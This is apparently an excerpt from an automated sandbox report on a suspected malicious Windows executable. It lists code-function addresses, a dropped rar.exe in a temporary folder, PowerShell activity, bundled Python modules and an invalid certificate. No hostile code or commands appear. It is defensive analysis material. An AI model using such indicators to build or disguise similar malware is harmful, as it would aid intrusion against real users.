              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2679F10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 4_2_00007FF7C2685EEC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C26869D4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2661000
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C266A34B
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2668BD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2671BC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2686488
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2680938
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2683C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2672C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2685C70
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C266A4E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2678154
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2680938
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C268411C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2673A14
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C26721D4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C26719B4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C267DACC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C267DF60
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2678804
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2671FD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C26717B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2689798
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2669870
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C26818E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C266AD1D
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2673610
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C267E5E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2671DC4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2675DA0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2679F10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FF7C2685EEC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0B8B12F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0B8B1880
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C039D00
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C09CF30
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0A4C70
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C042250
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0392B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0AACA0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C07BCC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C02BD30
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C04DDB0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C030DC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C064E70
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0BCEA0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0D4FC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0ABFC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C048020
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C047040
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C02A8C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C036930
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C082950
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0499A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C02FA10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C08BB00
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C084B20
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C076B40
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C029B90
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0D2BF0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C023C10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C05CC59
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C07CC40
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C03CC40
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0B8C80
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0C54A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0294D0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C06A510
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C024570
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C07B5B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0515A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0445A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C04E5C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C033650
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C07E670
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0806C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C097750
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0927E6
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C024820
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C08C840
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C02288E
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C065880
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C1540B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C024120
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0321E0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C03D2B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0E42B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C06F2D0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C04F2F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0232F5
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C04D310
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0AA300
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C027336
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C087350
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C03C380
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C0943B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C154418
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C1543F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB0C1A7C48
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1AB121D0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1AB01580
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1AB018C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1AB011A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1B6F530C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1B6F32A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1B712E60
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BA571A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BA410C0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BA43B20
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BB16090
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BB13B50
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BB13DF0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BB11000
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BB12DB0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1BB1C8D8
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1C258300
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1C2563A0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1D34AC30
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe | Code function: 7_2_00007FFB1D5BAA40
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFAA9C53027
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080A0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080C7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF70809ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080BAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe | Code function: 97_2_00007FF7080A1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080982F097_2_00007FF7080982F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A54C097_2_00007FF7080A54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809B54097_2_00007FF70809B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809188497_2_00007FF708091884
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CD91C97_2_00007FF7080CD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BD97C97_2_00007FF7080BD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080949B897_2_00007FF7080949B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D69FD97_2_00007FF7080D69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D5A7097_2_00007FF7080D5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CFA6C97_2_00007FF7080CFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080FAAC097_2_00007FF7080FAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809CB1497_2_00007FF70809CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D4B3897_2_00007FF7080D4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E9B9897_2_00007FF7080E9B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A8C3097_2_00007FF7080A8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D5C8C97_2_00007FF7080D5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E6D0C97_2_00007FF7080E6D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B9D0C97_2_00007FF7080B9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809DD0497_2_00007FF70809DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C0D2097_2_00007FF7080C0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D9D7497_2_00007FF7080D9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E1DCC97_2_00007FF7080E1DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809EE0897_2_00007FF70809EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A1E0497_2_00007FF7080A1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080DAE5097_2_00007FF7080DAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080EFE7497_2_00007FF7080EFE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A8E6897_2_00007FF7080A8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809CE8497_2_00007FF70809CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080DEEA497_2_00007FF7080DEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CAF0C97_2_00007FF7080CAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF708099EFC97_2_00007FF708099EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C5F4C97_2_00007FF7080C5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080FAF9097_2_00007FF7080FAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D4FE897_2_00007FF7080D4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080FDFD897_2_00007FF7080FDFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CC00C97_2_00007FF7080CC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A303097_2_00007FF7080A3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C804097_2_00007FF7080C8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C007497_2_00007FF7080C0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BC05C97_2_00007FF7080BC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F00F097_2_00007FF7080F00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B010497_2_00007FF7080B0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D216497_2_00007FF7080D2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D81CC97_2_00007FF7080D81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F41CC97_2_00007FF7080F41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080AE21C97_2_00007FF7080AE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809F24C97_2_00007FF70809F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B724497_2_00007FF7080B7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E226897_2_00007FF7080E2268
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D02A497_2_00007FF7080D02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080AD2C097_2_00007FF7080AD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080942E097_2_00007FF7080942E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E131497_2_00007FF7080E1314
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E832C97_2_00007FF7080E832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C037497_2_00007FF7080C0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A236097_2_00007FF7080A2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BC3E097_2_00007FF7080BC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D546897_2_00007FF7080D5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BD45897_2_00007FF7080BD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809A50497_2_00007FF70809A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080BF5B097_2_00007FF7080BF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CF59C97_2_00007FF7080CF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A859897_2_00007FF7080A8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E260C97_2_00007FF7080E260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C65FC97_2_00007FF7080C65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E766097_2_00007FF7080E7660
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F86D497_2_00007FF7080F86D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A86C497_2_00007FF7080A86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080CA71097_2_00007FF7080CA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D071097_2_00007FF7080D0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D270097_2_00007FF7080D2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A17C897_2_00007FF7080A17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B67E097_2_00007FF7080B67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080A289097_2_00007FF7080A2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF70809888497_2_00007FF708098884
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080E18A897_2_00007FF7080E18A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C38E897_2_00007FF7080C38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080D190C97_2_00007FF7080D190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080C090497_2_00007FF7080C0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: String function: 00007FF7080D49F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: String function: 00007FF7080A8444 appears 48 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1BA49570 appears 163 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C051E20 appears 33 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1BA494D8 appears 35 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1B7012B0 appears 37 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C1AF350 appears 67 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1B701250 appears 42 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FF7C2662910 appears 34 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C1AF4E8 appears 79 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C02A500 appears 163 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB0C029340 appears 135 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FFB1B701630 appears 84 times
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: String function: 00007FF7C2662710 appears 104 times
Source: X9g8L63QGs.exe | Static PE information: invalid certificate
Source: rar.exe.4.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.4.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: X9g8L63QGs.exe | Binary or memory string: OriginalFilename vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000000.1270283725.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameksetup.exej% vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibsslH vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_decimal.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1711105405.00007FFB0B9C9000.00000004.00000001.01000000.00000014.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000000.1276917721.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameksetup.exej% vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1711482875.00007FFB0BA99000.00000004.00000001.01000000.00000011.sdmp | Binary or memory string: OriginalFilenamelibsslH vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs X9g8L63QGs.exe
Source: X9g8L63QGs.exe, 00000007.00000002.1714669016.00007FFB167BB000.00000004.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs X9g8L63QGs.exe
